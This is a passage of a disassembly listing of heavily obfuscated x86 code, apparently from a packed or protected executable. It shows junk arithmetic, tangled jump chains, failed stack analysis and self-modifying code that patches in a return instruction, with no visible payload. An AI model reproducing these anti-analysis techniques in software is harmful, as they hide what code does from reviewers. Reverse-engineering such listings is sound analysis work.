; FUNCTION CHUNK AT 0044221A SIZE 00000015 BYTES
; FUNCTION CHUNK AT 00443DC6 SIZE 0000000A BYTES
; FUNCTION CHUNK AT 00445A20 SIZE 0000000C BYTES
; FUNCTION CHUNK AT 00446E7D SIZE 00000013 BYTES
; FUNCTION CHUNK AT 004484D7 SIZE 00000020 BYTES
; FUNCTION CHUNK AT 00448D1D SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0045608B SIZE 00000005 BYTES
; FUNCTION CHUNK AT 004560D8 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00456DED SIZE 0000001B BYTES

		xchg	ecx, [esp+0]
		pop	ecx
		cmp	ebx, esi
		pop	esi
		and	edx, 884E47BBh
		rol	edx, 10h
		push	ebx
		jmp	loc_4484D7
sub_4554E9	endp ; sp-analysis failed

; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43ED19

loc_4554FF:				; CODE XREF: sub_43ED19:loc_44173Dj
		xchg	edx, ecx
		test	edi, ebp
		jmp	loc_440667
; END OF FUNCTION CHUNK	FOR sub_43ED19
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43B2FD

loc_455508:				; CODE XREF: sub_43B2FD+1B34Ej
		adc	ebp, ebx
		push	edi

loc_45550B:				; CODE XREF: sub_43B2FD:loc_4425AEj
		call	sub_45405E
		mov	edx, 0CB804A30h
		jmp	loc_45A7ED
; END OF FUNCTION CHUNK	FOR sub_43B2FD
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44B814

loc_45551A:				; CODE XREF: sub_44B814:loc_451D97j
		push	0E31DDAADh
		pop	esi
		or	esi, 29645E1Bh
		test	esi, 10000h
		jmp	loc_446757
; END OF FUNCTION CHUNK	FOR sub_44B814

; =============== S U B	R O U T	I N E =======================================



sub_455531	proc near		; DATA XREF: sub_43B4F9:loc_44735Do

; FUNCTION CHUNK AT 00440EE1 SIZE 00000017 BYTES

		call	sub_44635E
		call	sub_458101

loc_45553B:				; CODE XREF: y2kk37jd:00455356j
		jmp	loc_440EE1
sub_455531	endp

; [00000001 BYTES: COLLAPSED FUNCTION nullsub_72. PRESS	KEYPAD "+" TO EXPAND]
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4552EB

loc_455541:				; CODE XREF: sub_4552EB+Cj
		jmp	loc_455E8B
; END OF FUNCTION CHUNK	FOR sub_4552EB
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_509. PRESS KEYPAD	"+" TO EXPAND]
; ---------------------------------------------------------------------------

loc_455547:				; CODE XREF: y2kk37jd:00455877j
		jmp	loc_44558C
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43B8D6

loc_45554C:				; CODE XREF: sub_43B8D6+19545j
		jmp	sub_442C3E
; END OF FUNCTION CHUNK	FOR sub_43B8D6
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_445226

loc_455551:				; CODE XREF: sub_445226+44BDj
		jmp	loc_43F831
; END OF FUNCTION CHUNK	FOR sub_445226

; =============== S U B	R O U T	I N E =======================================



sub_455556	proc near		; DATA XREF: sub_45BB99-8BF1o

; FUNCTION CHUNK AT 0043DBE8 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 004410B5 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0044BA43 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0044DAD6 SIZE 0000000B BYTES
; FUNCTION CHUNK AT 0044F28A SIZE 0000000B BYTES
; FUNCTION CHUNK AT 004586D9 SIZE 0000000B BYTES
; FUNCTION CHUNK AT 00458FAD SIZE 00000007 BYTES
; FUNCTION CHUNK AT 0045B42A SIZE 0000001A BYTES

		xor	edx, ebp
		rol	edx, 5
		add	edx, esp
		rol	edx, 5
		mov	[ebp-4], edx
		cmp	dword ptr [ebp-8], 0
		jmp	loc_44BA43
sub_455556	endp

; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_457D5A

loc_45556C:				; CODE XREF: sub_457D5A-BAE1j
		add	esi, 2282F78Ch
		xchg	esi, [esp+4+var_4]
		jmp	loc_45C1B5
; END OF FUNCTION CHUNK	FOR sub_457D5A
; ---------------------------------------------------------------------------

loc_45557A:				; CODE XREF: y2kk37jd:00452E45j
		jnz	loc_4551A1
		jmp	loc_44DA8E
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43F8B8

loc_455585:				; CODE XREF: sub_43F8B8+1B1E2j
		pop	edi
		rol	edi, 5
		sub	edi, 0E199FEF6h
		rol	edi, 0Ah
		or	edi, 923058E8h
		xor	edi, 0A4674D6Dh
		call	sub_43C7BF
; END OF FUNCTION CHUNK	FOR sub_43F8B8
; START	OF FUNCTION CHUNK FOR sub_4578A6

loc_4555A3:				; CODE XREF: sub_4578A6-C603j
		jmp	loc_450F6A
; END OF FUNCTION CHUNK	FOR sub_4578A6
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43ED86

loc_4555A8:				; CODE XREF: sub_43ED86+3CDAj
		jmp	loc_447533
; END OF FUNCTION CHUNK	FOR sub_43ED86
; ---------------------------------------------------------------------------

loc_4555AD:				; CODE XREF: y2kk37jd:0045794Ej
		jnz	loc_43D635
; START	OF FUNCTION CHUNK FOR sub_45B41E

loc_4555B3:				; CODE XREF: sub_45B41E:loc_45228Dj
		jmp	nullsub_378
; END OF FUNCTION CHUNK	FOR sub_45B41E
; ---------------------------------------------------------------------------
		test	ebx, edx
		jmp	loc_43D62E
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_453583

loc_4555BF:				; CODE XREF: sub_453583-7CB5j
		mov	[edi], eax
		xchg	ebx, [esp+4+var_4]
		push	offset sub_454C24
		jmp	nullsub_166
; END OF FUNCTION CHUNK	FOR sub_453583
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_440337

loc_4555CE:				; CODE XREF: sub_440337:loc_44721Dj
		jbe	loc_45A4C6
		jno	loc_44BA27
		or	edx, 67DF367Eh

loc_4555E0:				; CODE XREF: y2kk37jd:loc_4592B2j
		jmp	loc_456363
; END OF FUNCTION CHUNK	FOR sub_440337
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_456890

loc_4555E5:				; CODE XREF: sub_456890-72A6j
		add	eax, 604D1290h
		sub	eax, 0C7ECBA2Bh
		add	eax, 0C376690Ch
		add	eax, ebp
		call	sub_44107E
; END OF FUNCTION CHUNK	FOR sub_456890
; START	OF FUNCTION CHUNK FOR sub_43F618

loc_4555FE:				; CODE XREF: sub_43F618+8B11j
		jmp	loc_43B232
; END OF FUNCTION CHUNK	FOR sub_43F618
; ---------------------------------------------------------------------------

loc_455603:				; CODE XREF: y2kk37jd:0043F30Cj
		jnz	loc_454754
		jmp	loc_44336F
; ---------------------------------------------------------------------------

loc_45560E:				; CODE XREF: y2kk37jd:004569CCj
		push	1ACC0BAFh

; =============== S U B	R O U T	I N E =======================================



sub_455613	proc near		; CODE XREF: sub_44DE80+5AA3p

; FUNCTION CHUNK AT 0043C7B4 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00443026 SIZE 00000006 BYTES
; FUNCTION CHUNK AT 00451064 SIZE 00000012 BYTES
; FUNCTION CHUNK AT 00451FE2 SIZE 0000001E BYTES
; FUNCTION CHUNK AT 0045401D SIZE 00000011 BYTES

		xchg	ecx, [esp+0]
		pop	ecx
		push	8DAD0778h
		or	esi, 0D04680A3h
		jmp	loc_451FE2
sub_455613	endp ; sp-analysis failed

; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_445226

loc_455627:				; CODE XREF: sub_445226:loc_45846Cj
		rol	ecx, 6
		jmp	loc_44FA32
; END OF FUNCTION CHUNK	FOR sub_445226

; =============== S U B	R O U T	I N E =======================================



sub_45562F	proc near		; CODE XREF: sub_455C2D-15E70j

; FUNCTION CHUNK AT 004515B4 SIZE 00000004 BYTES

		push	ebx
		adc	edx, 7432D68Ah
		adc	ebp, 973FE2CEh
		jmp	loc_4515B4
sub_45562F	endp

; ---------------------------------------------------------------------------
		mov	ds:dword_444AE0, eax
		xor	eax, eax
		push	ebx
		push	78719F35h
		pop	ebx
		and	ebx, 0E21A97E1h
		add	ebx, 0D5E7F0DCh
		jmp	loc_45315D
; ---------------------------------------------------------------------------

loc_455660:				; CODE XREF: y2kk37jd:00445A84j
		push	offset sub_43FE26
		jmp	loc_459B7A
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_453778

loc_45566A:				; CODE XREF: sub_453778:loc_453CE3j
		mov	[edx], eax
		pop	edx
		call	sub_447659
; END OF FUNCTION CHUNK	FOR sub_453778
; START	OF FUNCTION CHUNK FOR sub_43C638

loc_455672:				; CODE XREF: sub_43C638-900j
		jmp	sub_43C638
; END OF FUNCTION CHUNK	FOR sub_43C638

; =============== S U B	R O U T	I N E =======================================



sub_455677	proc near		; CODE XREF: y2kk37jd:loc_44F9E0p
					; sub_4553C1+4FC6j

var_4		= dword	ptr -4

; FUNCTION CHUNK AT 0043DE7C SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0044459E SIZE 0000001B BYTES
; FUNCTION CHUNK AT 0044F157 SIZE 0000001A BYTES

		xchg	esi, [esp+4+var_4]
		pop	esi
		jb	loc_44459E
		push	ecx
		push	0D31456D9h
		pop	ecx
		add	ecx, 0E977B6A8h
		rol	ecx, 3
		jmp	loc_44F157
sub_455677	endp ; sp-analysis failed

; ---------------------------------------------------------------------------
		xor	esi, ecx
		pop	esi
		jmp	sub_43BE53
; ---------------------------------------------------------------------------
		pushf
		jmp	loc_43B161
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_45689F

loc_4556A4:				; CODE XREF: sub_45689F-17BFCj
					; sub_445226+414Aj
		jo	loc_43D84E
		xor	esi, 98B4CAE7h
		jmp	loc_44DE34
; END OF FUNCTION CHUNK	FOR sub_45689F
; ---------------------------------------------------------------------------

loc_4556B5:				; CODE XREF: y2kk37jd:004476A5j
		sub	al, 99h
		mov	edx, [ebp-4]
		jmp	loc_45B1B7
; ---------------------------------------------------------------------------
		db 0F7h
		dd 1CCD04C6h, 0BA05E96Fh
		db 0FEh, 0FFh
; ---------------------------------------------------------------------------

loc_4556CA:				; CODE XREF: y2kk37jd:00448386j
		push	edx
		call	sub_45141B

loc_4556D0:				; DATA XREF: sub_454400+9o
		lea	eax, nullsub_76
		mov	byte ptr [eax],	0C3h
		jmp	nullsub_76
; ---------------------------------------------------------------------------
		xchg	edi, [esp]
		mov	edx, edi
		xchg	eax, [esp]
		mov	edi, eax
		pop	eax
		jmp	loc_44BC9A
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_446303

loc_4556EE:				; CODE XREF: sub_446303-399Ej
		jge	loc_43CAD3
		pop	ebp
		or	ebx, 0E327F202h
		pushf
		mov	[ebx], ebp
		adc	edx, ebx
		jmp	loc_43CAD3
; END OF FUNCTION CHUNK	FOR sub_446303
; ---------------------------------------------------------------------------
		pushf
		cmp	ecx, 60CFEC43h
		jmp	loc_4415F9
; ---------------------------------------------------------------------------

loc_455711:				; CODE XREF: y2kk37jd:004535C4j
		jge	loc_440073
; START	OF FUNCTION CHUNK FOR sub_455E6A

loc_455717:				; CODE XREF: sub_455E6A+1j
		jmp	loc_446CB0
; END OF FUNCTION CHUNK	FOR sub_455E6A
; ---------------------------------------------------------------------------
		jmp	loc_444CBE
; ---------------------------------------------------------------------------
		sbb	eax, ebx
		sub	edi, 0E85A25F7h
		pushf
		jmp	loc_44006D
; ---------------------------------------------------------------------------

loc_45572F:				; CODE XREF: y2kk37jd:00451128j
		pushf
		push	25AF2384h
		pop	esi
		or	esi, 0ED3E72B4h
; START	OF FUNCTION CHUNK FOR sub_443525

loc_45573C:				; CODE XREF: sub_443525+AC43j
		cmp	esi, 4ED5422Ah
		jmp	loc_453EB4
; END OF FUNCTION CHUNK	FOR sub_443525
; ---------------------------------------------------------------------------
		push	edi
		push	0A50FC8AFh
		pop	edi
		xor	edi, 48B242F2h
		and	edi, 44873C29h
		jnz	loc_4455A5

loc_455760:				; CODE XREF: y2kk37jd:004552C6j
		jmp	loc_459661
; ---------------------------------------------------------------------------
		and	edi, ebx
		cmp	ebp, 5DEFFBCDh
		jmp	loc_44559F
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_445226

loc_455772:				; CODE XREF: sub_445226:loc_44D66Cj
		pop	ecx
		add	ecx, 0A4374811h
		jb	loc_43E123
		and	esi, ebp
		adc	ecx, 0E0D9530Ch
		jmp	loc_43E11A
; END OF FUNCTION CHUNK	FOR sub_445226
; ---------------------------------------------------------------------------
		mov	eax, 510AEA73h
		push	eax
		push	0FD60E22h
		sbb	eax, 8C329B20h
		jmp	loc_4557C8
; ---------------------------------------------------------------------------
		mov	esi, [ebp+0]
		jmp	loc_4566A2
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43F911

loc_4557AA:				; CODE XREF: sub_43F911+DFB1j
		or	edi, eax
		mov	ebp, ebx
		cmp	esi, ecx
		jmp	loc_44DE2E
; END OF FUNCTION CHUNK	FOR sub_43F911
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44289F

loc_4557B5:				; CODE XREF: sub_44289F+17954j
		and	esi, 0A5607A60h
		cmp	esi, 55F7A690h
		jmp	loc_44A212
; END OF FUNCTION CHUNK	FOR sub_44289F
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_44. PRESS	KEYPAD "+" TO EXPAND]
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_137. PRESS KEYPAD	"+" TO EXPAND]
; ---------------------------------------------------------------------------

loc_4557C8:				; CODE XREF: y2kk37jd:0045579Dj
		jmp	loc_456690
; ---------------------------------------------------------------------------

loc_4557CD:				; CODE XREF: y2kk37jd:004549FFj
		jmp	loc_443641
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_442A84

loc_4557D2:				; CODE XREF: sub_442A84+BA7Bj
		jmp	nullsub_169
; END OF FUNCTION CHUNK	FOR sub_442A84

; =============== S U B	R O U T	I N E =======================================



sub_4557D7	proc near		; CODE XREF: y2kk37jd:00449E28j
					; sub_43F728+A92Bp

; FUNCTION CHUNK AT 00458D52 SIZE 00000005 BYTES

		xchg	edi, [esp+0]
		pop	edi
		add	eax, ebp
		add	eax, 81BDFFFh
		popf
		jmp	loc_458D52
sub_4557D7	endp ; sp-analysis failed

; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44C79E

loc_4557E9:				; CODE XREF: sub_44C79E:loc_43C994j
		pop	edx
		or	edx, 83264A8Bh
		and	edx, 0E0D9837Ch
		add	edx, 3F1550C1h
		push	offset sub_44F896
		jmp	loc_446798
; END OF FUNCTION CHUNK	FOR sub_44C79E
; ---------------------------------------------------------------------------

loc_455806:				; DATA XREF: sub_455299:loc_44829Bo
		push	3251FF0Bh
		pop	edi
		or	edi, 7867D3B9h
		sub	edi, 1B5835F4h
		jmp	loc_44615A
; ---------------------------------------------------------------------------

loc_45581D:				; CODE XREF: y2kk37jd:0043E932j
					; y2kk37jd:loc_44738Fj
		and	edx, 893995F6h
		add	edx, 0F820CB7Ah
		mov	[edx], eax
		pop	edx
		lea	eax, sub_4543EF
		push	offset sub_4415E3
		jmp	locret_44A3A0
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_307. PRESS KEYPAD	"+" TO EXPAND]
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44E648

loc_45583D:				; CODE XREF: sub_44E648-330Bj
		pop	ebp
		mov	[edi], ebp
		jmp	loc_43D512
; END OF FUNCTION CHUNK	FOR sub_44E648
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43C7B9

loc_455845:				; CODE XREF: sub_43C7B9+1F983j
		cmp	edx, esi
		jmp	loc_457203
; END OF FUNCTION CHUNK	FOR sub_43C7B9
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43C865

loc_45584C:				; CODE XREF: sub_43C865+1A4F9j
					; y2kk37jd:00457E86j
		sub	ecx, 0E192F186h
		add	ebp, esi

loc_455854:				; CODE XREF: sub_44D6BF:loc_45177Cj
		jmp	loc_448D2D
; END OF FUNCTION CHUNK	FOR sub_43C865
; ---------------------------------------------------------------------------

loc_455859:				; DATA XREF: sub_455BE9-A54Eo
		push	0B80145h
		pop	edx
		rol	edx, 2
		xor	edx, 0CDB1FF9Dh
		rol	edx, 14h
		sub	edx, 0A92F5BB9h
		xor	edx, 0F1F37BDh
		jmp	loc_455547
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44113A

loc_45587C:				; CODE XREF: sub_44113A+138ABj
		or	eax, 0C7B58C3Ah
		add	eax, 1EFE34FFh
		add	eax, ebp
		add	eax, 1101CB6Bh
		mov	eax, [eax]
		test	dword ptr [eax], 0FFFF0000h
		jnz	loc_44F2A6
		jmp	loc_43C182
; END OF FUNCTION CHUNK	FOR sub_44113A
; ---------------------------------------------------------------------------
		sbb	ebp, eax
		test	ebp, edi
		jmp	loc_4434C7
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4448E2

loc_4558AC:				; CODE XREF: sub_4448E2+A63Cj
					; sub_447977+BD76j
		jp	loc_44D03F
		or	eax, esi
		ror	esi, 1Ah

loc_4558B7:				; CODE XREF: sub_447977:loc_4523ADj
		mov	eax, [ebp+var_10]
		jmp	loc_459BDA
; END OF FUNCTION CHUNK	FOR sub_4448E2
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44853F

loc_4558BF:				; CODE XREF: sub_44853F:loc_44652Fj
		xchg	eax, [esp-4+arg_0]
		jmp	loc_4414A9
; END OF FUNCTION CHUNK	FOR sub_44853F
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44615F

loc_4558C7:				; CODE XREF: sub_44615F:loc_440733j
					; sub_440DC1:loc_4448BAj ...
		jno	loc_446524
		sub	ebx, 10000h
		mov	eax, [ebx]
		neg	eax
		call	sub_44DAA6

loc_4558DC:				; CODE XREF: sub_443360:loc_44D967j
		or	eax, eax
		jnz	loc_443F76
		jmp	loc_459DD9
; END OF FUNCTION CHUNK	FOR sub_44615F
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43C851

loc_4558E9:				; CODE XREF: sub_43C851:loc_44E72Bj
		jge	loc_453AE6
		cmp	esi, ecx
		jmp	loc_44B07F
; END OF FUNCTION CHUNK	FOR sub_43C851
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44107E

loc_4558F6:				; CODE XREF: sub_44107E+D3B0j
					; sub_44107E+D3BEj
		add	edi, 1096AC83h
		rol	edi, 18h
		add	edi, 5A4729B2h
		mov	[edi], eax
; END OF FUNCTION CHUNK	FOR sub_44107E
; START	OF FUNCTION CHUNK FOR sub_4458DD

loc_455907:				; CODE XREF: sub_4458DD:loc_44C069j
		jmp	loc_446FFD
; END OF FUNCTION CHUNK	FOR sub_4458DD
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43C044

loc_45590C:				; CODE XREF: sub_43C044+Bj
		xor	edx, 0F073ED06h
		sub	edx, 0DA6AA59Bh
		and	edx, ds:4000EEh
		add	edx, 7A1ED118h
		mov	[edx], eax
		jmp	loc_44575E
; END OF FUNCTION CHUNK	FOR sub_43C044
; ---------------------------------------------------------------------------

loc_45592B:				; DATA XREF: sub_45024B-BE5Co
		jz	loc_452E58
		mov	dword ptr [ebp-8], 1
		jmp	loc_43BCE3

; =============== S U B	R O U T	I N E =======================================

; Attributes: bp-based frame


sub_45593D	proc near		; CODE XREF: sub_45024Bj

var_8		= dword	ptr -8
var_1		= byte ptr -1

; FUNCTION CHUNK AT 0043BCCF SIZE 0000001F BYTES
; FUNCTION CHUNK AT 00452E58 SIZE 0000000A BYTES
; FUNCTION CHUNK AT 00454B93 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0045A1E3 SIZE 00000005 BYTES

		push	ebp
		mov	ebp, esp
		add	esp, 0FFFFFFF8h
		jmp	loc_454B93
sub_45593D	endp

; ---------------------------------------------------------------------------

loc_455948:				; DATA XREF: sub_44E3A8o
		call	sub_455958
		jmp	ds:off_41E10C
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_445226

loc_455953:				; CODE XREF: sub_445226+113C3j
		jmp	loc_43D149
; END OF FUNCTION CHUNK	FOR sub_445226

; =============== S U B	R O U T	I N E =======================================



sub_455958	proc near		; CODE XREF: sub_446120-999Ej
					; y2kk37jd:0043E4B3j ...

var_4		= dword	ptr -4

; FUNCTION CHUNK AT 0043C3D6 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0043D825 SIZE 00000011 BYTES
; FUNCTION CHUNK AT 0043E4B8 SIZE 0000000F BYTES
; FUNCTION CHUNK AT 0044568C SIZE 0000000B BYTES
; FUNCTION CHUNK AT 004529B2 SIZE 00000006 BYTES
; FUNCTION CHUNK AT 004532C8 SIZE 00000021 BYTES

		pop	edx
		jnb	loc_43E4B8
		mov	eax, [esp+0]
		push	ebp
		mov	ebp, edx
		jmp	loc_43C3D6
sub_455958	endp ; sp-analysis failed


; =============== S U B	R O U T	I N E =======================================

; Attributes: bp-based frame


sub_45596A	proc near		; CODE XREF: sub_43C0A5j

; FUNCTION CHUNK AT 0043E5D0 SIZE 0000000B BYTES
; FUNCTION CHUNK AT 0043E69F SIZE 00000019 BYTES
; FUNCTION CHUNK AT 0043EA99 SIZE 00000009 BYTES
; FUNCTION CHUNK AT 00448FDD SIZE 00000020 BYTES
; FUNCTION CHUNK AT 00451AE3 SIZE 0000000B BYTES
; FUNCTION CHUNK AT 004592DA SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0045A37B SIZE 00000005 BYTES

		push	ebp
		mov	ebp, esp
		push	ecx
		mov	esp, ebp
		jmp	loc_45A37B
sub_45596A	endp ; sp-analysis failed

; [00000001 BYTES: COLLAPSED FUNCTION nullsub_492. PRESS KEYPAD	"+" TO EXPAND]
; ---------------------------------------------------------------------------
		or	dword ptr [edi+5A00006Bh], 0FFFFFF8Bh
		add	al, 24h
		call	sub_448088
; START	OF FUNCTION CHUNK FOR sub_44EE3D

loc_455984:				; CODE XREF: sub_44EE3D+C8EAj
		jmp	loc_44CEFD
; END OF FUNCTION CHUNK	FOR sub_44EE3D
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_447918

loc_455989:				; CODE XREF: sub_447918+5j
		jmp	nullsub_170
; END OF FUNCTION CHUNK	FOR sub_447918

; =============== S U B	R O U T	I N E =======================================



sub_45598E	proc near		; CODE XREF: sub_44B47E+23E1p
					; y2kk37jd:00454507j

; FUNCTION CHUNK AT 0043E7BA SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0044A13A SIZE 0000000A BYTES

		xchg	edi, [esp+0]
		pop	edi
		add	eax, 3Ch
		mov	eax, [eax]
		jmp	loc_43E7BA
sub_45598E	endp ; sp-analysis failed

; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44866D

loc_45599C:				; CODE XREF: sub_44866D+14j
		jz	loc_447EE2
		jmp	loc_4459C7
; END OF FUNCTION CHUNK	FOR sub_44866D

; =============== S U B	R O U T	I N E =======================================



sub_4559A7	proc near		; DATA XREF: sub_44BAB3+6o

; FUNCTION CHUNK AT 00458CB9 SIZE 00000006 BYTES

		add	edx, ebp
		add	edx, 2037C886h
		mov	edx, [edx]
		imul	byte ptr [edx]
		cmp	al, 0A4h
		jmp	loc_458CB9
sub_4559A7	endp ; sp-analysis failed

; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4543B8

loc_4559BA:				; CODE XREF: sub_4543B8+Ej
		jz	loc_45403B
		jmp	loc_44C171
; END OF FUNCTION CHUNK	FOR sub_4543B8
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43E0DE

loc_4559C5:				; CODE XREF: sub_43E0DE+E884j
		rol	ebx, 12h
		add	ebx, 103D3E3Dh
		js	loc_455CB3
		push	0E551B744h
		jmp	loc_44E61E
; END OF FUNCTION CHUNK	FOR sub_43E0DE
; ---------------------------------------------------------------------------
		add	eax, edx
		jmp	sub_458A74
; ---------------------------------------------------------------------------

loc_4559E5:				; CODE XREF: y2kk37jd:0043C7A0j
		jnb	loc_44A249
; START	OF FUNCTION CHUNK FOR sub_43F0A5

loc_4559EB:				; CODE XREF: sub_43F0A5+138EBj
		jmp	loc_445277
; END OF FUNCTION CHUNK	FOR sub_43F0A5
; ---------------------------------------------------------------------------
		mov	ebx, 1B4F06EFh
		jnp	loc_44837E
		jmp	loc_44A243
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4421DC

loc_455A00:				; CODE XREF: sub_4421DC+10CE6j
		xor	ecx, 0EF8D8FF3h
		add	ecx, ebp
		add	ecx, 11E25029h
		mov	ecx, [ecx]
		jmp	loc_457EB6
; END OF FUNCTION CHUNK	FOR sub_4421DC
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43CBDE

loc_455A15:				; CODE XREF: sub_43CBDE+181BCj
		xchg	edx, [esi]
		jmp	loc_43CBAC
; END OF FUNCTION CHUNK	FOR sub_43CBDE
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4578A6

loc_455A1C:				; CODE XREF: sub_4578A6-6938j
		sub	al, 99h
		mov	edx, [ebp-4]
		imul	byte ptr [edx]
		push	offset sub_43E03C
		jmp	nullsub_223
; END OF FUNCTION CHUNK	FOR sub_4578A6

; =============== S U B	R O U T	I N E =======================================

; Attributes: thunk


sub_455A2D	proc near		; CODE XREF: sub_44AAA1+3A39j
		retn
sub_455A2D	endp

; ---------------------------------------------------------------------------

loc_455A2E:				; CODE XREF: y2kk37jd:00454C95j
		jmp	loc_45815B
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_446E19

loc_455A33:				; CODE XREF: sub_446E19-6CA3j
		jmp	nullsub_11
; END OF FUNCTION CHUNK	FOR sub_446E19
; ---------------------------------------------------------------------------
		sub	ebx, ebp
		push	eax
		jmp	sub_43BD49
; ---------------------------------------------------------------------------

loc_455A40:				; CODE XREF: y2kk37jd:00453ECFj
		not	ecx
		or	ebx, eax
		sub	edi, edx
		xchg	edi, [ecx]
		jmp	loc_445AB7
; ---------------------------------------------------------------------------

locret_455A4D:				; CODE XREF: y2kk37jd:00444A14j
		retn
; ---------------------------------------------------------------------------

loc_455A4E:				; CODE XREF: y2kk37jd:00444D07j
		jmp	loc_4581DC

; =============== S U B	R O U T	I N E =======================================



sub_455A53	proc near		; CODE XREF: y2kk37jd:0043DAADj
					; sub_4587AA-974Fp

; FUNCTION CHUNK AT 00441829 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00447B8C SIZE 0000000E BYTES

		xchg	eax, [esp+0]
		pop	eax
		push	6A5C3D65h
		pop	eax
		or	eax, 15B6A3B8h
		jmp	loc_441829
sub_455A53	endp ; sp-analysis failed

; ---------------------------------------------------------------------------
		jo	loc_455079
		xor	eax, 0AC4D0D7Bh
		jmp	sub_452C4F
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43EF4F

loc_455A79:				; CODE XREF: sub_43EF4F:loc_44B5C4j
		add	eax, 0E90FD0Fh
		ror	eax, 15h
		xor	eax, 5B4E9C39h
		ror	eax, 1Eh
		add	eax, 0D0E9676Dh
		ror	eax, 18h
		xor	eax, 0D6B7FF8Dh
		jmp	loc_443261
; END OF FUNCTION CHUNK	FOR sub_43EF4F
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4448E2

loc_455A9F:				; CODE XREF: sub_4448E2:loc_45BF35j
		push	offset sub_45BC3F
		jmp	nullsub_421
; END OF FUNCTION CHUNK	FOR sub_4448E2

; =============== S U B	R O U T	I N E =======================================

; Attributes: thunk


sub_455AA9	proc near		; CODE XREF: sub_448C53:loc_43FA6Aj
		retn
sub_455AA9	endp

; ---------------------------------------------------------------------------
		jmp	ds:off_41E000
; ---------------------------------------------------------------------------

loc_455AB0:				; CODE XREF: y2kk37jd:00450743j
		jmp	loc_4521BD
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4429DD

loc_455AB5:				; CODE XREF: sub_4458CA:loc_446B9Cj
					; sub_4429DD:loc_448282j ...
		pop	edx
		jo	loc_4429EF
		mov	eax, [esp-8+arg_4]
		jmp	loc_44A151
; END OF FUNCTION CHUNK	FOR sub_4429DD
; ---------------------------------------------------------------------------

loc_455AC4:				; CODE XREF: y2kk37jd:loc_45617Bj
					; y2kk37jd:0045C05Aj
		call	sub_4412BF
; START	OF FUNCTION CHUNK FOR sub_43D58E

loc_455AC9:				; CODE XREF: sub_43D58E+1CABAj
		call	sub_441518
; END OF FUNCTION CHUNK	FOR sub_43D58E
; START	OF FUNCTION CHUNK FOR sub_448CAE

loc_455ACE:				; CODE XREF: sub_448CAE+8D07j
		jmp	loc_4543B1
; END OF FUNCTION CHUNK	FOR sub_448CAE
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43F618

loc_455AD3:				; CODE XREF: sub_43F618-43DAj
		jmp	loc_43C484
; END OF FUNCTION CHUNK	FOR sub_43F618
; ---------------------------------------------------------------------------
		jle	loc_45761A
		jmp	sub_451C21
; ---------------------------------------------------------------------------

loc_455AE3:				; CODE XREF: y2kk37jd:loc_43CDF0j
					; y2kk37jd:0043CDFAj
		add	ecx, 0F67443D5h
